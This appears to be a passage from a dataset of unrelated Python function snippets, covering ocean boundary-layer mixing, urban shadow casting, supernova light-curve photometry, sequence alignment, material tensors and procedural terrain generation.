(zscaleb**2+(self.epssfcb**2*self.hbbl_old[j]**2)))\n else:\n Kern = zscale / (zscale + (self.epssfcs*self.hbls_old[j]))\n else:\n Kern = 1.\n \n\n\n self.Kern[j,k_w] = Kern\n self.FC[j,k_w] = self.FC[j,k_w+1] + Kern * (\\\n ( ( u[j,k_r+1] - u[j,k_r] )**2 + ( v_upts[j,k_r+1] - v_upts[j,k_r])**2 ) \\\n / (Hz[j,k_r] + Hz[j,k_r+1]) \\\n - 0.5 * ( Hz[j,k_r] + Hz[j,k_r+1]) * (self.Ri_inv * self.bvf[j,k_w] + self.C_Ek*self.f[j]*self.f[j]))\n\n\n #\t\tLOOP THAT FINDS BL DEPTH ##\n #----> LOOP TOP TO BOTTOM (start at free surface, w-level surface) \n \n if self.LMD_KPP:\n #swdk_r only used in this function so don't need to be class attribute\n # but for testing make it an attribute to see what it is\n \n # fortran equivlanet ===> k=N,1,-1 \n for k in range(N,0,-1):\n # INDEX MAP\n k_r = k-1\n k_w = k\n\n ###################################################################### \n self.swdk_r[j,k_w] = np.sqrt( self.swr_frac[j,k_w] * self.swr_frac[j,k_w-1])\n zscale = z_u_w[j,N] - z_u_r[j,k_r]\n Bfsfc = self.Bo[j] + self.Bosol[j] * (1-self.swdk_r[j,k_w])\n \n self.bvf_max = np.sqrt(np.max([0,self.bvf[j,k_w-1]]))\n \n # CALCULATE TURBULENT VELOCITY SCALE FOR TRACERS\n \t\t\t self.ws = self.lmd_wscale_ws_only(Bfsfc, zscale,self.hbls_old[j],self.ustar[j])\n \n self.Vtsq = self.Vtc * self.ws* self.bvf_max + self.V0\n \n\n self.Cr[j,k_w] = self.FC[j,k_w] + self.Vtsq\n \n\n #######################################################################\n \n # SEARCH FOR hbls vertical level #\n '''\n kbl is specified at vertical w-level (via Cr which is at\n vertical w-levels)\n '''\n if self.kbl[j] == 0 and self.Cr[j,k_w] < 0:\n self.kbl[j] = k_w\n if self.LIMIT_MO_DEPTH:\n if self.kmo[j] == 0 and Bfsfc*(z_u_w[j,N] - z_u_r[j,k_r]) > self.C_h_MO[j]:\n self.kmo[j] = k_w\n\n \n #--> still in j-loop\n #######################################################\n \n # \t\tGET SURFACE BOUNDARY LAYER DEPTH # \n self.hbls[j] = z_u_w[j,N] - z_u_w[j,0] + self.eps # set hbls as depth of entire water column\n if self.kbl[j] > 0:\n k_w = self.kbl[j]\n k_r = k_w - 1 \n if k_w == N: # set hbls at the surface btwn w- and rho-levels at surface\n self.hbls[j] = z_u_w[j,N] - z_u_r[j,N-1]\n \n else:\n self.hbls[j] = z_u_w[j,N] - ( z_u_r[j,k_r] * self.Cr[j,k_w+1] - z_u_r[j,k_r+1] * self.Cr[j,k_w]) / \\\n (self.Cr[j,k_w+1] - self.Cr[j,k_w])\n \n if self.LIMIT_MO_DEPTH:\n if self.kmo[j] > 0:\n k_w = self.kmo[j]\n k_r = k_w-1\n if k_w == N:\n z_up = z_u_w[j,N]\n cff_up = np.max([0,Bo[j]])\n else:\n z_up = z_r[j,k_w+1]\n cff_up = np.max([0, Bo[j] + self.Bosol[j]*(1-self.swdk_r[j,(k_w-1)+1])])\n \n cff_dn = np.max([0,Bo[j] + self.Bosol[j] * (1-self.swdk_r[j,k_w])]) \n h_MO = z_u_w[j,N] + self.C_h_MO[j] * ( cff_up*z_up - cff_dn * z_u_r[j,k_r] ) \\\n / ( cff_up * cff_dn * (z_up - z_u_r[j,k_r]) ) \\\n + self.C_h_MO[j] * (cff_dn - cff_up)\n\n self.hbls[j] = np.min([self.hbls[j],np.max([h_MO,0])])\n\n\n\n #### GET BOTTOM BOUNDARY LAYER DEPTH #######\n if self.LMD_BKPP:\n self.kbl[j] = 0 # reset Cr at bottom and kbl for BKPP\n self.Cr[j,0] = 0.\n self.FC[j,0] = 1.5 * self.FC[j,1] - 0.5 * self.FC[j,2] # linear extrapolation\n \n #---> LOOP BOTTOM TO TOP\n # FIND kbl for BBL\n for k in range(1,N+1):\n k_r = k-1\n k_w = k \n self.Cr[j,k_w] = self.FC[j,k_w] - self.FC[j,0]\n \n # LOOK FOR FIRST ZERO CROSSING FROM BOTTOM UP\n if self.kbl[j] == 0 and self.Cr[j,k_w] > 0:\n self.kbl[j] = k_w \n \n\n self.hbbl[j] = z_u_w[j,N] - z_u_w[j,0] # total depth\n if self.kbl[j] > 0 :\n k_w = self.kbl[j] \n k_r = k_w -1\n if k_w == 1: # NO BBL CASE\n self.hbbl[j] = z_u_r[j,0] - z_u_w[j,0] #in between bottom rho and w-level\n else:\n self.hbbl[j] = ( z_u_r[j,k_r-1] * self.Cr[j,k_w] - z_u_r[j,k_r] * self.Cr[j,k_w-1]) / \\\n (self.Cr[j,k_w] - self.Cr[j,k_w-1]) - z_u_w[j,0]", "def grow_stack_arm(top):\n if top is not None and top.name in ['sandwichtop', 'sandwichtop_no_label']:\n _bot = find_sandwich_bottom(top)\n if _bot is None:\n return\n if top.ey > 0:\n top.reset_y()\n _ty = top.spr.get_xy()[1]\n _th = top.spr.get_dimensions()[1]\n _by = _bot.spr.get_xy()[1]\n _dy = _by - (_ty + _th)\n if _dy > 0:\n top.expand_in_y(_dy / top.scale)\n top.refresh()", "def shadowingfunction_wallheight_23(a, vegdem, vegdem2, azimuth, altitude, scale, amaxvalue, bush, walls, aspect):\n\n if not walls.size:\n \"\"\" needs to be checked\n walls=ordfilt2(a,4,[0 1 0; 1 0 1; 0 1 0]);\n walls=walls-a;\n walls(walls<3)=0;\n sizex=size(a,1);%might be wrong\n sizey=size(a,2);\n dirwalls = filter1Goodwin_as_aspect_v3(walls,sizex,sizey,scale,a);\n aspect=dirwalls*pi/180;\n \"\"\"\n\n # conversion\n degrees = np.pi/180\n azimuth *= degrees\n altitude *= degrees\n \n # measure the size of the image\n\n sizex = np.shape(a)[0]\n sizey = np.shape(a)[1]\n \n # initialise parameters\n dx = 0\n dy = 0\n dz = 0\n \n sh = np.zeros((sizex, sizey))\n vbshvegsh = np.copy(sh)\n vegsh = np.copy(sh)\n f = np.copy(a)\n shvoveg = np.copy(vegdem) # for vegetation shadowvolume\n g = np.copy(sh)\n bushplant = bush > 1\n #wallbol = np.array([np.float(boolean) for row in walls > 0 for boolean in row])\n # wallbol = np.copy(sh)\n # wallbol[walls > 0] = 1.\n wallbol = (walls > 0).astype(float)\n wallbol[wallbol == 0] = np.nan\n\n pibyfour = np.pi/4\n threetimespibyfour = 3*pibyfour\n fivetimespibyfour = 5*pibyfour\n seventimespibyfour = 7*pibyfour\n sinazimuth = np.sin(azimuth)\n cosazimuth = np.cos(azimuth)\n tanazimuth = np.tan(azimuth)\n signsinazimuth = np.sign(sinazimuth)\n signcosazimuth = np.sign(cosazimuth)\n dssin = np.abs(1/sinazimuth)\n dscos = np.abs(1/cosazimuth)\n tanaltitudebyscale = np.tan(altitude)/scale\n\n tempvegdem = np.zeros((sizex, sizey))\n tempvegdem2 = np.zeros((sizex, sizey))\n temp = np.zeros((sizex, sizey))\n\n index = 0\n\n # main loop\n while (amaxvalue>=dz) and (np.abs(dx)<sizex) and (np.abs(dy)<sizey):\n if ((pibyfour <= azimuth) and (azimuth < threetimespibyfour)) or \\\n ((fivetimespibyfour <= azimuth) and (azimuth < seventimespibyfour)):\n dy = signsinazimuth*(index+1)\n dx = -1*signcosazimuth*np.abs(np.round((index+1)/tanazimuth))\n ds = dssin\n else:\n dy = signsinazimuth*np.abs(np.round((index+1)*tanazimuth))\n dx = -1*signcosazimuth*(index+1)\n ds = dscos\n\n # note: dx and dy represent absolute values while ds is an incremental value\n dz = ds*(index+1)*tanaltitudebyscale\n tempvegdem[0:sizex, 0:sizey] = 0\n tempvegdem2[0:sizex, 0:sizey] = 0\n temp[0:sizex, 0:sizey] = 0\n \n absdx = np.abs(dx)\n absdy = np.abs(dy)\n\n xc1 = int((dx+absdx)/2)\n xc2 = int(sizex+(dx-absdx)/2)\n yc1 = int((dy+absdy)/2)\n yc2 = int(sizey+(dy-absdy)/2)\n\n xp1 = -int((dx-absdx)/2)\n xp2 = int(sizex-(dx+absdx)/2)\n yp1 = -int((dy-absdy)/2)\n yp2 = int(sizey-(dy+absdy)/2)\n\n tempvegdem[int(xp1):int(xp2), int(yp1):int(yp2)] = vegdem[int(xc1):int(xc2), int(yc1):int(yc2)] - dz\n tempvegdem2[int(xp1):int(xp2), int(yp1):int(yp2)] = vegdem2[int(xc1):int(xc2), int(yc1):int(yc2)] - dz\n temp[int(xp1):int(xp2), int(yp1):int(yp2)] = a[int(xc1):int(xc2), int(yc1):int(yc2)] - dz\n\n f = np.max([f, temp], axis=0)\n #f = np.array([np.max(val) for val in zip(f, temp)])\n shvoveg = np.max([shvoveg, tempvegdem], axis=0)\n sh[f > a] = 1\n sh[f <= a] = 0 #Moving building shadow\n fabovea = (tempvegdem > a).astype(int) #vegdem above DEM\n gabovea = (tempvegdem2 > a).astype(int) #vegdem2 above DEM\n vegsh2 = fabovea - gabovea\n vegsh = np.max([vegsh, vegsh2], axis=0)\n vegsh[vegsh*sh > 0] = 0 # removing shadows 'behind' buildings\n vbshvegsh = np.copy(vegsh) + vbshvegsh\n\n # vegsh at high sun altitudes\n if index == 0:\n firstvegdem = np.copy(tempvegdem) - np.copy(temp)\n firstvegdem[firstvegdem <= 0] = 1000\n vegsh[firstvegdem < dz] = 1\n vegsh *= (vegdem2 > a)\n vbshvegsh = np.zeros((sizex, sizey))\n\n # Bush shadow on bush plant\n if np.max(bush) > 0 and np.max(fabovea*bush) > 0:\n tempbush = np.zeros((sizex, sizey))\n tempbush[int(xp1):int(xp2), int(yp1):int(yp2)] = bush[int(xc1):int(xc2), int(yc1):int(yc2)] - dz\n g = np.max([g, tempbush], axis=0)\n g = bushplant * g\n \n # if index<3 #removing shadowed walls 1\n # tempfirst(1:sizex,1:sizey)=0;\n # tempfirst(xp1:xp2,yp1:yp2)= a(xc1:xc2,yc1:yc2);\n # if index==1 # removing shadowed walls 2\n # tempwalls(1:sizex,1:sizey)=0;\n # tempwalls(xp1:xp2,yp1:yp2)= wallbol(xc1:xc2,yc1:yc2);\n # wallfirst=((tempwalls+wallbol).*wallbol)==2;\n # wallfirstaspect=aspect.*wallbol.*wallfirst;\n # wallfirstaspect(wallfirstaspect==0)=NaN;\n # wallfirstsun=(wallfirstaspect>azimuth-pi/2 & wallfirstaspect<azimuth+pi/2);\n # wallfirstshade=wallfirst-wallfirstsun;\n # end\n # end\n \n index += 1\n # imagesc(h),axis image,colorbar\n # Stopping loop if all shadows reached the ground\n # stopbuild=stopbuild==f;\n # imagesc(stopbuild),axis image,pause(0.3)\n # fin=find(stopbuild==0, 1);\n # stopbuild=f;\n # stopveg=stopveg==vegsh;\n # finveg=find(stopveg==0, 1);\n # stopveg=vegsh;\n # if isempty(fin) && isempty(finveg)\n # dz=amaxvalue+9999;\n # end\n\n # Removing walls in shadow due to selfshadowing\n azilow = azimuth - np.pi/2\n azihigh = azimuth + np.pi/2\n if azilow >= 0 and azihigh < 2*np.pi: # 90 to 270 (SHADOW)\n facesh = np.logical_or(aspect < azilow, aspect >= azihigh).astype(float) - wallbol + 1 # TODO check\n elif azilow < 0 and azihigh <= 2*np.pi: # 0 to 90\n azilow = azilow + 2*np.pi\n facesh = np.logical_or(aspect > azilow, aspect <= azihigh) * -1 + 1 # (SHADOW)\n elif azilow > 0 and azihigh >= 2*np.pi: # 270 to 360\n azihigh -= 2 * np.pi\n facesh = np.logical_or(aspect > azilow, aspect <= azihigh)*-1 + 1 # (SHADOW)\n\n sh = 1-sh\n vbshvegsh[vbshvegsh > 0] = 1\n vbshvegsh = vbshvegsh-vegsh\n \n if np.max(bush) > 0:\n g = g-bush\n g[g > 0] = 1\n g[g < 0] = 0\n vegsh = vegsh-bushplant+g\n vegsh[vegsh < 0] = 0\n\n vegsh[vegsh > 0] = 1\n shvoveg = (shvoveg-a) * vegsh #Vegetation shadow volume\n vegsh = 1-vegsh\n vbshvegsh = 1-vbshvegsh\n\n #removing walls in shadow\n # tempfirst=tempfirst-a;\n # tempfirst(tempfirst<2)=1;\n # tempfirst(tempfirst>=2)=0;\n \n shvo = f - a # building shadow volume\n\n facesun = np.logical_and(facesh + (walls > 0).astype(float) == 1, walls > 0).astype(float)\n #facesun = np.reshape(np.array([np.float(boolean) for row in facesun for boolean in row]), facesun.shape)\n\n wallsun = np.copy(walls-shvo)\n wallsun[wallsun < 0] = 0\n wallsun[facesh == 1] = 0 # Removing walls in \"self\"-shadow\n # wallsun(tempfirst = = 0) = 0# Removing walls in shadow 1\n # wallsun(wallfirstshade = = 1) = 0# Removing walls in shadow 2\n wallsh = np.copy(walls-wallsun)\n # wallsh(wallfirstshade = = 1) = 0\n # wallsh = wallsh+(wallfirstshade.*walls)\n #wallbol = np.reshape(np.array([np.float(boolean) for row in walls > 0 for boolean in row]), walls.shape)\n wallbol = (walls > 0).astype(float)\n\n wallshve = shvoveg * wallbol\n wallshve = wallshve - wallsh\n wallshve[wallshve < 0] = 0\n id = np.where(wallshve > walls)\n wallshve[id] = walls[id]\n wallsun = wallsun-wallshve # problem with wallshve only\n id = np.where(wallsun < 0)\n wallshve[id] = 0\n wallsun[id] = 0\n \n # subplot(2,2,1),imagesc(facesh),axis image ,colorbar,title('facesh')#\n # subplot(2,2,2),imagesc(wallsun,[0 20]),axis image, colorbar,title('Wallsun')#\n # subplot(2,2,3),imagesc(sh-vegsh*0.8), colorbar,axis image,title('Groundsh')#\n # subplot(2, 2, 4), imagesc(wallshve, [0 20]), axis image, colorbar, title('Wallshve')#\n return vegsh, sh, vbshvegsh, wallsh, wallsun, wallshve, facesh, facesun", "def rigid_rings(self):\n raise NotImplementedError", "def compose_lwss_gun (glider_gun, A = -1, B = -1, C = -1):\n if (A < 0): A = 40\n if (B < 0): B = A;\n if (C < 0): C = A;\n\n m = min (A, B, C)\n a = A - m\n b = B - m\n c = C - m\n return \\\n glider_gun[4 * a] ( A, -A - 3, flip_x) + \\\n glider_gun[4 * b] (-B + 2, -B + 1) + \\\n glider_gun[4 * c + 1] (-C + 6, C, flip_y)", "def sharpen_bands(self):\n for label in self.labels:\n self.sharp_bands[label] = self.bands[label] - self.gauss_bands[\n label]", "def __bcc_left_diagonals(self) -> cq.cq.Workplane:\n # In a cuboid ABCDA1B1C1D1 this is the angle C1AD\n #angle_C1AD = 90 - degrees(acos(2**-.5))\n angle_C1AD = 90 - degrees(acos(0.5))\n angle_CAD = 90 - degrees(acos(sqrt(2/3)))\n pseudo_unit_cell_size = sqrt(2/3)*self.unit_cell_size\n corner_points = np.array(\n [(0, 0),\n (self.bcc_unit_cell_size, 0),\n (self.bcc_unit_cell_size, self.unit_cell_size),\n (0, self.unit_cell_size)]\n )\n result = (\n cq.Workplane(\"XY\")\n .pushPoints(corner_points)\n .eachpointAdaptive(\n create_bcc_diagonal_strut,\n callback_extra_args = [\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": - angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": 0.5 * pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": - angle_C1AD},\n {\"unit_cell_size\": pseudo_unit_cell_size,\n \"radius\": self.strut_radius,\n \"angle_x\": angle_CAD,\n \"angle_y\": angle_C1AD}\n ],\n useLocalCoords = True\n )\n )\n return result", "def diagonalizing_gates(self):\n raise NotImplementedError", "def get_sn2005ek(colorplt=False):\n z = 0.016551\n ebv = 0.210\n D = cosmo.luminosity_distance([z])[0].value * 1e+6 # in pc\n dis_mod = 5*np.log10(D / 10)\n t_max = 53639.9\n print (\"adopt r band t_max from Drout+13\")\n \n # tb = pd.read_csv('/Users/yuhanyao/Desktop/ZTF18abfcmjw/data/Drout2013/table1', sep='\\t')\n # tb = tb.drop(columns=[\"Unnamed: 6\"])\n \n mjds = np.array([53639.3, 53640.3, 53641.3, 53642.2, 53643.2, 53645.3,\n 53646.5, 53648.0, 53649.2, 53650.4, 53651.3, 53652.5,\n 53654.2, 53655.2, 53656.2, 53657.2])\n \n Bmags = np.array([18.25, 18.38, 18.65, np.nan, 19.10, 19.71,\n 20.07, np.nan, 20.67, 20.90, 21.05, np.nan,\n 21.74, np.nan, np.nan, np.nan])\n \n Bmag_uncs = np.array([0.02, 0.03, 0.02, np.nan, 0.05, 0.07, \n 0.07, np.nan, 0.04, 0.04, 0.04, np.nan,\n 0.12, np.nan, np.nan, np.nan])\n \n Vmags = np.array([17.83, 18.03, 17.92, np.nan, 18.24, 18.66,\n 18.93, 19.48, 19.63, 19.86, 19.98, 20.35,\n 20.60, 20.74, 20.88, 21.22])\n \n Vmag_uncs = np.array([0.02, 0.03, 0.01, np.nan, 0.02, 0.02,\n 0.02, 0.06, 0.03, 0.03, 0.04, 0.05, \n 0.08, 0.10, 0.08, 0.13])\n \n Rmags = np.array([17.46, 17.41, 17.60, 17.69, 17.86, 18.18, \n np.nan, 18.83, 19.03, 19.26, 19.48, 19.75,\n 20.08, np.nan, 20.47, np.nan])\n \n Rmag_uncs = np.array([0.01, 0.02, 0.01, 0.02, 0.01, 0.01,\n np.nan, 0.03, 0.02, 0.02, 0.02, 0.04,\n 0.05, np.nan, 0.08, np.nan])\n\n Imags = np.array([17.20, 17.13, 17.18, np.nan, 17.47, 17.71, \n np.nan, 18.13, 18.26, 18.51, 18.61, 18.74, \n 19.01, np.nan, 19.47, np.nan])\n \n Imag_uncs = np.array([0.02, 0.04, 0.02, np.nan, 0.03, 0.02,\n np.nan, 0.06, 0.02, 0.02, 0.02, 0.03,\n 0.05, np.nan, 0.06, np.nan])\n \n mymjds = np.hstack([mjds, mjds, mjds, mjds])\n mymags = np.hstack([Bmags, Vmags, Rmags, Imags])\n myemags = np.hstack([Bmag_uncs, Vmag_uncs, Rmag_uncs, Imag_uncs])\n myfilts = np.hstack([ np.repeat(\"B\", len(Bmags)),\n np.repeat(\"V\", len(Bmags)),\n np.repeat(\"R\", len(Rmags)),\n np.repeat(\"I\", len(Imags)) ])\n ix = ~np.isnan(mymags)\n tb = pd.DataFrame({'mjd': mymjds[ix],\n 'mag': mymags[ix],\n 'emag': myemags[ix],\n \"filter\": myfilts[ix]})\n \n ixB = tb['filter'].values==\"B\"\n ixV = tb['filter'].values==\"V\"\n ixR = tb['filter'].values==\"R\"\n ixI = tb['filter'].values==\"I\"\n \n tb['wave'] = np.zeros(len(tb))\n tb['wave'].values[ixB] = 4359\n tb['wave'].values[ixV] = 5430\n tb['wave'].values[ixR] = 6349\n tb['wave'].values[ixI] = 8797\n \n tb['mag0'] = tb['mag'] - extinction.ccm89(tb['wave'].values, 3.1*ebv, 3.1)\n tb['mag0_abs'] = tb['mag0'] - dis_mod\n tb['tmax_rf'] = (tb['mjd'] - t_max) / (1+z)\n if colorplt==False:\n return tb\n else:\n tb = add_datecol(tb)\n ix = np.in1d(tb[\"filter\"].values, np.array(['B', 'R', 'I']))\n tb = tb[ix]\n\n dates = get_date_span(tb)\n datesave = []\n for i in range(len(dates)):\n x = dates[i]\n ix = tb[\"date\"].values == x\n tbsub = tb[ix]\n if len(tbsub)!=0:\n flts = tbsub['filter'].values\n if \"R\" in flts and np.sum(np.unique(flts))!=1:\n datesave.append(x)\n datesave = np.array(datesave)\n \n mcolor = []\n mcolor_unc = []\n mjds = []\n colorname = []\n for i in range(len(datesave)):\n x = datesave[i]\n ix = tb[\"date\"].values == x\n tbsub = tb[ix]\n gtb = tbsub[tbsub[\"filter\"].values==\"B\"]\n rtb = tbsub[tbsub[\"filter\"].values==\"R\"]\n itb = tbsub[tbsub[\"filter\"].values==\"I\"]\n if len(gtb)!=0:\n gmjds = gtb[\"mjd\"].values\n gmags = gtb[\"mag0\"].values\n gemags = gtb[\"emag\"].values\n gwtgs = 1/gemags**2\n gmag = np.sum(gmags * gwtgs) / np.sum(gwtgs)\n gmjd = np.sum(gmjds * gwtgs) / np.sum(gwtgs)\n gemag = 1/ np.sqrt(np.sum(gwtgs))\n if len(rtb)!=0:\n rmjds = rtb[\"mjd\"].values\n rmags = rtb[\"mag0\"].values\n remags = rtb[\"emag\"].values\n rwtgs = 1/remags**2\n rmag = np.sum(rmags * rwtgs) / np.sum(rwtgs)\n rmjd = np.sum(rmjds * rwtgs) / np.sum(rwtgs)\n remag = 1/ np.sqrt(np.sum(rwtgs))\n if len(itb)!=0:\n imjds = itb[\"mjd\"].values\n imags = itb[\"mag0\"].values\n iemags = itb[\"emag\"].values\n iwtgs = 1/iemags**2\n imag = np.sum(imags * iwtgs) / np.sum(iwtgs)\n imjd = np.sum(imjds * iwtgs) / np.sum(iwtgs)\n iemag = 1/ np.sqrt(np.sum(iwtgs))\n if len(gtb)!=0 and len(rtb)!=0:\n mcolor.append(gmag - rmag)\n mjds.append( 0.5 * (gmjd + rmjd) )\n mcolor_unc.append( np.sqrt(gemag**2 + remag**2) )\n colorname.append(\"BmR\")\n if len(rtb)!=0 and len(itb)!=0:\n mcolor.append(rmag - imag)\n mjds.append( 0.5 * (rmjd + imjd) )\n mcolor_unc.append( np.sqrt(remag**2 + iemag**2) )\n colorname.append(\"RmI\")\n \n ctb = Table(data = [mjds, mcolor, mcolor_unc, colorname],\n names = [\"mjd\", \"c\", \"ec\", \"cname\"])\n \n ctb['tmax_rf'] = (ctb['mjd'] - t_max) / (1+z)\n ctb = ctb.to_pandas()\n return ctb", "def fibre_strain_energy(self, l_stretch):\n if l_stretch <= 1.0:\n # compressed region - no energy\n return 0.0\n\n # Note: this range should be '< lm' according to FEBio but we use '<=' to\n # make setting c6 easier -> there's no difference because it's cts.\n if l_stretch <= self.lm:\n # exponential energy\n return self.c3 * (exp(self.c4 * (l_stretch - 1.0)) - 1.0)\n\n # linear energy\n return self.c5 * l_stretch + self.c6", "def fill_matrix(self):\n\n print(\"Creating Needleman-Wunsch matrix..\")\n\n for i in range(self.matrix.shape[0]):\n for j in range(self.matrix.shape[1]):\n\n if i < len(self.seq_2) and j < len(self.seq_1):\n self.matrix[0, i + 2] = self.seq_2[i]\n self.matrix[j + 2, 0] = self.seq_1[j]\n\n if i > 1 and j > 1:\n self.matrix[1, j] = self.matrix[1, j - 1] + self.GAP\n self.matrix[i, 1] = self.matrix[i - 1, 1] + self.GAP\n\n diag = (self.matrix[i - 1, j - 1] + self.compare(self.matrix[0, j], self.matrix[i, 0]))\n up = (self.matrix[i, j - 1] + self.GAP)\n left = (self.matrix[i - 1, j] + self.GAP)\n\n selected = max(diag, up, left)\n\n self.add_arrow(i, j, diag, up, left, selected)\n\n self.matrix[i, j] = selected", "def quartz():\n\n rho = 2649.\n\n C = np.zeros((6,6), dtype=float)\n C[0,0] = 86.9; C[0,1] = 7.6; C[0,2] = 12.; C[0,3] = 17.8; C[0,4] = 0.; C[0,5] = 0.\n C[1,0] = C[0,1]; C[1,1] = 86.9; C[1,2] = 12.; C[1,3] = -17.8; C[1,4] = 0.; C[1,5] = 0.\n C[2,0] = C[0,2]; C[2,1] = C[1,2]; C[2,2] = 106.4; C[2,3] = 0.; C[2,4] = 0.; C[2,5] = 0.\n C[3,0] = C[0,3]; C[3,1] = C[1,3]; C[3,2] = C[2,3]; C[3,3] = 59.5; C[3,4] = 0.; C[3,5] = 0.\n C[4,0] = C[0,4]; C[4,1] = C[1,4]; C[4,2] = C[2,4]; C[4,3] = C[3,4]; C[4,4] = 59.5; C[4,5] = -17.8\n C[5,0] = C[0,5]; C[5,1] = C[1,5]; C[5,2] = C[2,5]; C[5,3] = C[3,5]; C[5,4] = C[4,5]; C[5,5] = 39.6\n\n return C, rho", "def generate_pre_heights(self):\n\n config = self.config\n\n def get_lands_oceans():\n oceans, lands = [], []\n for x in xrange(self.size):\n for y in xrange(self.size):\n coord = x, y\n if self[coord] <= 0:\n oceans.append(coord)\n else:\n lands.append(coord)\n return lands, oceans\n\n def add_heights():\n \"\"\"Add pre heights for diamond-square\n \"\"\"\n fac_min = 50\n fac_max = 40\n\n print 'Get lands and oceans'\n t = time.time()\n lands, oceans = get_lands_oceans()\n print 'lands and oceans getted: ', time.time() - t\n\n # TODO: create one def with params: mount_level and other for create heights\n # add default heights\n for coord in lands:\n self[coord] = self.config.land_mount_level[1]\n\n for coord in oceans:\n self[coord] = -self.config.mid_mount_level[1]\n\n # add low heights for lands\n count_land = int(round(len(lands) * config.factor_low_mount / 100.))\n land_coords = []\n\n starts = random.randint(count_land / fac_min, count_land / fac_max)\n for start in xrange(starts):\n start_coord = lands[random.randint(0, len(lands)-1)]\n land_coords.append(start_coord)\n self[start_coord] = random.randint(self.config.low_mount_level[0], self.config.low_mount_level[1])\n\n while count_land > 0:\n # for lands\n if count_land > 0:\n dx = random.randint(-1,1)\n dy = random.randint(-1,1)\n coord = land_coords[random.randint(0, len(land_coords) - 1)]\n coord = coord[0] + dx, coord[1] + dy\n if coord not in land_coords:\n self[coord] = random.randint(self.config.low_mount_level[0], self.config.low_mount_level[1])\n land_coords.append(coord)\n count_land -= 1\n\n\n target_lands = land_coords\n\n # -------------------------------------------------------------------------------\n # add mid heights for lands\n count_land = int(round(len(target_lands) * (config.factor_mid_mount / 100.)))\n land_coords = []\n\n starts = random.randint(count_land / (fac_min * 3), count_land / (fac_max*3))\n for start in xrange(starts):\n start_coord = target_lands[random.randint(0, len(target_lands)-1)]\n land_coords.append(start_coord)\n self[start_coord] = random.randint(self.config.mid_mount_level[0],\n self.config.mid_mount_level[1])\n\n if land_coords == []:\n return\n\n while count_land > 0:\n # for lands\n if count_land > 0:\n dx = random.randint(-1,1)\n dy = random.randint(-1,1)\n coord = land_coords[random.randint(0, len(land_coords) - 1)]\n coord = coord[0] + dx, coord[1] + dy\n #if coord not in land_coords:\n self[coord] = random.randint(self.config.mid_mount_level[0],\n self.config.mid_mount_level[1])\n land_coords.append(coord)\n count_land -= 1\n\n\n target_lands = land_coords\n\n\n # -------------------------------------------------------------------------------\n # add high heights for lands\n count_land = int(round(len(target_lands) * (config.factor_high_mount / 100.)))\n land_coords = []\n\n starts = random.randint(count_land / (fac_min * 4), count_land / (fac_max * 3))\n for start in xrange(starts):\n start_coord = target_lands[random.randint(0, len(target_lands)-1)]\n land_coords.append(start_coord)\n self[start_coord] = random.randint(self.config.high_mount_level[0],\n self.config.high_mount_level[1])\n\n while count_land > 0:\n # for lands\n if count_land > 0:\n dx = random.randint(-1,1)\n dy = random.randint(-1,1)\n try:\n coord = land_coords[random.randint(0, len(land_coords) - 1)]\n except ValueError:\n coord = lands[random.randint(0, len(lands) - 1)]\n coord = coord[0] + dx, coord[1] + dy\n #if coord not in land_coords:\n self[coord] = random.randint(self.config.high_mount_level[0],\n self.config.high_mount_level[1])\n land_coords.append(coord)\n count_land -= 1\n\n\n\n\n def square_diamond(sx, sy, size, strong):\n \"\"\"Algorithm Square-diamond generate terrain heights\n\n -> http://www.lighthouse3d.com/opengl/terrain/index.php?mpd2\n \"\"\"\n if size == 1:\n return\n\n dsize = size/2\n ex = sx+size-1\n ey = sy+size-1\n # lets get math style\n\n\n # SQUARE STEP\n\n A = sx, sy\n B = ex, sy\n C = sx, ey\n D = ex, ey\n E = sx+dsize, sy+dsize\n F = sx, sy + dsize\n G = sx + dsize, sy\n H = ex, sy + dsize\n I = sx + dsize, ey\n\n def RAND(X):\n return random.randint(-strong, strong)\n\n ### for coasts dont disappear\n\n def normalize(add_z, X):\n if self[X] <= 0:\n if add_z > 0:\n add_z = -5\n else:\n if add_z <= 0:\n add_z = 5\n return add_z\n\n # Generate heights\n # E = (A+B+C+D) / 4 + RAND(d)\n # F = (A + C + E + E) / 4 + RAND(d)\n # G = (A + B + E + E) / 4 + RAND(d)\n # H = (B + D + E + E) / 4 + RAND(d)\n # I = (C + D + E + E) / 4 + RANS(d)\n\n ### E\n\n try:\n\n add_z = ((self[A] + self[B] + self[C] + self[D]) / 4) + RAND(E)\n\n except KeyError, e:\n print A, B, C, D, size, dsize, len(self)\n raise e\n\n\n self[E] = normalize(add_z, E)\n\n ### F\n\n add_z = (self[A] + self[C] + self[E] + self[E]) / 4 + RAND(F)\n\n self[F] = normalize(add_z, F)\n\n ### G\n\n add_z = (self[A] + self[B] + self[E] + self[E]) / 4 + RAND(G)\n\n self[G] = normalize(add_z, G)\n\n ### H\n\n add_z = (self[B] + self[D] + self[E] + self[E]) / 4 + RAND(H)\n\n self[H] = normalize(add_z, H)\n\n ### I\n add_z = (self[C] + self[D] + self[E] + self[E]) / 4 + RAND(I)\n\n self[I] = normalize(add_z, I)\n\n\n # DIAMOND STEP\n\n # get coordinates\n # 0 - x, 1 - y\n\n x, y = 0, 1\n\n dx = (G[x] - A[x]) / 2\n dy = (F[y] - A[y]) / 2\n\n J = A[x] + dx, A[y] + dy\n K = G[x] + dx, G[y] + dy\n L = F[x] + dx, F[y] + dy\n M = E[x] + dx, E[y] + dy\n\n N = A[x], A[y] + dy\n O = A[x] + dx, A[y]\n P = G[x], G[y] + dy\n Q = A[x] + dx, F[y]\n\n # Generate Heights\n # J = (A + G + F + E)/4 + RAND(d)\n # K = (G + B + E + H)/4 + RAND(d)\n # L = (F + E + C + I)/4 + RAND(d)\n # M = (E + H + I + D)/4 + RAND(d)\n\n # J\n add_z = ((self[A] + self[G] + self[F] + self[E]) / 4) + RAND(J)\n self[J] = normalize(add_z, J)\n\n # K\n add_z = ((self[G] + self[B] + self[E] + self[H]) / 4) + RAND(K)\n self[K] = normalize(add_z, K)\n\n # L\n add_z = ((self[F] + self[E] + self[C] + self[I]) / 4) + RAND(L)\n self[L] = normalize(add_z, L)\n\n # M\n add_z = ((self[E] + self[H] + self[I] + 